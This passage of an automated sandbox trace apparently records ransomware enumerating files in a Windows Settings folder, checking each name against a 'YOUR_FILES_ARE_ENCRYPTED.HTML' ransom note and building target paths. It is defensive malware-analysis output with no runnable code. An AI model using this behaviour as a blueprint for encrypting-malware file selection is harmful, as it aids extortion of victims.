(lpFirst="AAA_SettingsGroupMapsUpdates.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.594] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupMapsUpdates.settingcontent-ms") returned 173 [0121.594] PathFindExtensionW (pszPath="AAA_SettingsGroupMapsUpdates.settingcontent-ms") returned=".settingcontent-ms" [0121.594] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.594] PathFindExtensionW (pszPath="AAA_SettingsGroupMapsUpdates.settingcontent-ms") returned=".settingcontent-ms" [0121.594] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef6bba7d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xef6bba7d, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x490, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupNotificationsAppList.settingcontent-ms", cAlternateFileName="AAC25D~1.SET")) returned 1 [0121.594] StrStrIW (lpFirst="AAA_SettingsGroupNotificationsAppList.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.594] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupNotificationsAppList.settingcontent-ms") returned 182 [0121.594] PathFindExtensionW (pszPath="AAA_SettingsGroupNotificationsAppList.settingcontent-ms") returned=".settingcontent-ms" [0121.594] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.594] PathFindExtensionW (pszPath="AAA_SettingsGroupNotificationsAppList.settingcontent-ms") returned=".settingcontent-ms" [0121.594] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0a8d3e7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf0a8d3e7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2391d733, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x475, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms", cAlternateFileName="AAECAE~1.SET")) returned 1 [0121.594] StrStrIW (lpFirst="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.594] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupOneSyncAccounts.settingcontent-ms") returned 177 [0121.594] PathFindExtensionW (pszPath="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms") returned=".settingcontent-ms" [0121.594] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.594] PathFindExtensionW (pszPath="AAA_SettingsGroupOneSyncAccounts.settingcontent-ms") returned=".settingcontent-ms" [0121.594] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0d15b3d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf0d15b3d, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupPCSystemDetails.settingcontent-ms", cAlternateFileName="AA7B22~1.SET")) returned 1 [0121.595] StrStrIW (lpFirst="AAA_SettingsGroupPCSystemDetails.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.595] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemDetails.settingcontent-ms") returned 177 [0121.595] PathFindExtensionW (pszPath="AAA_SettingsGroupPCSystemDetails.settingcontent-ms") returned=".settingcontent-ms" [0121.595] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.595] PathFindExtensionW (pszPath="AAA_SettingsGroupPCSystemDetails.settingcontent-ms") returned=".settingcontent-ms" [0121.595] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1868e9a, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf1868e9a, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x49f, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms", cAlternateFileName="AA90D6~1.SET")) returned 1 [0121.595] StrStrIW (lpFirst="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.595] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms") returned 186 [0121.595] PathFindExtensionW (pszPath="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms") returned=".settingcontent-ms" [0121.595] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.595] PathFindExtensionW (pszPath="AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms") returned=".settingcontent-ms" [0121.595] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1cbb2a9, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf1cbb2a9, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x486, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms", cAlternateFileName="AA8AD4~1.SET")) returned 1 [0121.595] StrStrIW (lpFirst="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.595] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms") returned 181 [0121.595] PathFindExtensionW (pszPath="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms") returned=".settingcontent-ms" [0121.595] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.595] PathFindExtensionW (pszPath="AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms") returned=".settingcontent-ms" [0121.595] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf21a60a1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf21a60a1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x482, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms", cAlternateFileName="AAEE78~1.SET")) returned 1 [0121.595] StrStrIW (lpFirst="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.595] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms") returned 181 [0121.595] PathFindExtensionW (pszPath="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms") returned=".settingcontent-ms" [0121.595] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.595] PathFindExtensionW (pszPath="AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms") returned=".settingcontent-ms" [0121.595] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf22fd6b9, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf22fd6b9, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x434, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupPen.settingcontent-ms", cAlternateFileName="AAD39C~1.SET")) returned 1 [0121.595] StrStrIW (lpFirst="AAA_SettingsGroupPen.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.595] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPen.settingcontent-ms") returned 165 [0121.595] PathFindExtensionW (pszPath="AAA_SettingsGroupPen.settingcontent-ms") returned=".settingcontent-ms" [0121.595] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.595] PathFindExtensionW (pszPath="AAA_SettingsGroupPen.settingcontent-ms") returned=".settingcontent-ms" [0121.595] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf24ed57a, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf24ed57a, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x238f74d9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48f, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms", cAlternateFileName="AA8BAF~1.SET")) returned 1 [0121.595] StrStrIW (lpFirst="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.595] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms") returned 184 [0121.595] PathFindExtensionW (pszPath="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms") returned=".settingcontent-ms" [0121.595] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.595] PathFindExtensionW (pszPath="AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms") returned=".settingcontent-ms" [0121.595] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf29fe6c2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf29fe6c2, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x238ab028, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a1, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms", cAlternateFileName="AAAECF~1.SET")) returned 1 [0121.595] StrStrIW (lpFirst="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.596] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms") returned 185 [0121.596] PathFindExtensionW (pszPath="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms") returned=".settingcontent-ms" [0121.596] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.596] PathFindExtensionW (pszPath="AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms") returned=".settingcontent-ms" [0121.596] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5d3009a, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf5d3009a, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2339a047, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b5, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms", cAlternateFileName="AACD91~1.SET")) returned 1 [0121.596] StrStrIW (lpFirst="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.596] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms") returned 189 [0121.596] PathFindExtensionW (pszPath="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms") returned=".settingcontent-ms" [0121.596] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.596] PathFindExtensionW (pszPath="AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms") returned=".settingcontent-ms" [0121.596] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5dc8b02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf5dc8b02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2339a047, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x488, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms", cAlternateFileName="AAF7F3~1.SET")) returned 1 [0121.596] StrStrIW (lpFirst="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.596] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms") returned 180 [0121.596] PathFindExtensionW (pszPath="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms") returned=".settingcontent-ms" [0121.596] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.596] PathFindExtensionW (pszPath="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms") returned=".settingcontent-ms" [0121.596] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5e614f0, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf5e614f0, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x498, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms", cAlternateFileName="AAF226~1.SET")) returned 1 [0121.596] StrStrIW (lpFirst="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.596] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms") returned 184 [0121.596] PathFindExtensionW (pszPath="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms") returned=".settingcontent-ms" [0121.596] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.596] PathFindExtensionW (pszPath="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms") returned=".settingcontent-ms" [0121.596] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5ef9cb3, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf5ef9cb3, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms", cAlternateFileName="AA3E8B~1.SET")) returned 1 [0121.596] StrStrIW (lpFirst="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.596] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms") returned 183 [0121.596] PathFindExtensionW (pszPath="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms") returned=".settingcontent-ms" [0121.596] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.596] PathFindExtensionW (pszPath="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms") returned=".settingcontent-ms" [0121.596] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf605130f, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf605130f, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x471, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms", cAlternateFileName="AAC29B~1.SET")) returned 1 [0121.596] StrStrIW (lpFirst="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.596] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupSpeechMicrophone.settingcontent-ms") returned 178 [0121.596] PathFindExtensionW (pszPath="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms") returned=".settingcontent-ms" [0121.596] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.596] PathFindExtensionW (pszPath="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms") returned=".settingcontent-ms" [0121.596] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7139dfb, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7139dfb, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47b, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms", cAlternateFileName="AA18E7~1.SET")) returned 1 [0121.596] StrStrIW (lpFirst="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.597] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms") returned 180 [0121.597] PathFindExtensionW (pszPath="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms") returned=".settingcontent-ms" [0121.597] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.597] PathFindExtensionW (pszPath="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms") returned=".settingcontent-ms" [0121.597] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7624aaf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7624aaf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupVirtualDesktops.settingcontent-ms", cAlternateFileName="AA8C6B~1.SET")) returned 1 [0121.597] StrStrIW (lpFirst="AAA_SettingsGroupVirtualDesktops.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.597] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupVirtualDesktops.settingcontent-ms") returned 177 [0121.597] PathFindExtensionW (pszPath="AAA_SettingsGroupVirtualDesktops.settingcontent-ms") returned=".settingcontent-ms" [0121.597] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.597] PathFindExtensionW (pszPath="AAA_SettingsGroupVirtualDesktops.settingcontent-ms") returned=".settingcontent-ms" [0121.597] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf77a22ff, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77a22ff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x461, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsGroupYourAccount.settingcontent-ms", cAlternateFileName="AA1C73~1.SET")) returned 1 [0121.597] StrStrIW (lpFirst="AAA_SettingsGroupYourAccount.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.597] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupYourAccount.settingcontent-ms") returned 173 [0121.597] PathFindExtensionW (pszPath="AAA_SettingsGroupYourAccount.settingcontent-ms") returned=".settingcontent-ms" [0121.597] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.597] PathFindExtensionW (pszPath="AAA_SettingsGroupYourAccount.settingcontent-ms") returned=".settingcontent-ms" [0121.597] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf79de4ea, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf79de4ea, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x435, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageAccountsManage.settingcontent-ms", cAlternateFileName="AAD2AF~1.SET")) returned 1 [0121.597] StrStrIW (lpFirst="AAA_SettingsPageAccountsManage.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.597] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsManage.settingcontent-ms") returned 175 [0121.597] PathFindExtensionW (pszPath="AAA_SettingsPageAccountsManage.settingcontent-ms") returned=".settingcontent-ms" [0121.597] lstrlenW (lpString=".settingcontent-ms") returned 18 [0121.597] PathFindExtensionW (pszPath="AAA_SettingsPageAccountsManage.settingcontent-ms") returned=".settingcontent-ms" [0121.597] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf89aa04e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf89aa04e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0x630488, dwReserved1=0x6f80b8, cFileName="AAA_SettingsPageAccountsPicture.settingcontent-ms", cAlternateFileName="AA8DF2~1.SET")) returned 1 [0121.597] StrStrIW (lpFirst="AAA_SettingsPageAccountsPicture.settingcontent-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.597] wnsprintfW (in: pszDest=0x680348, cchDest=32768, 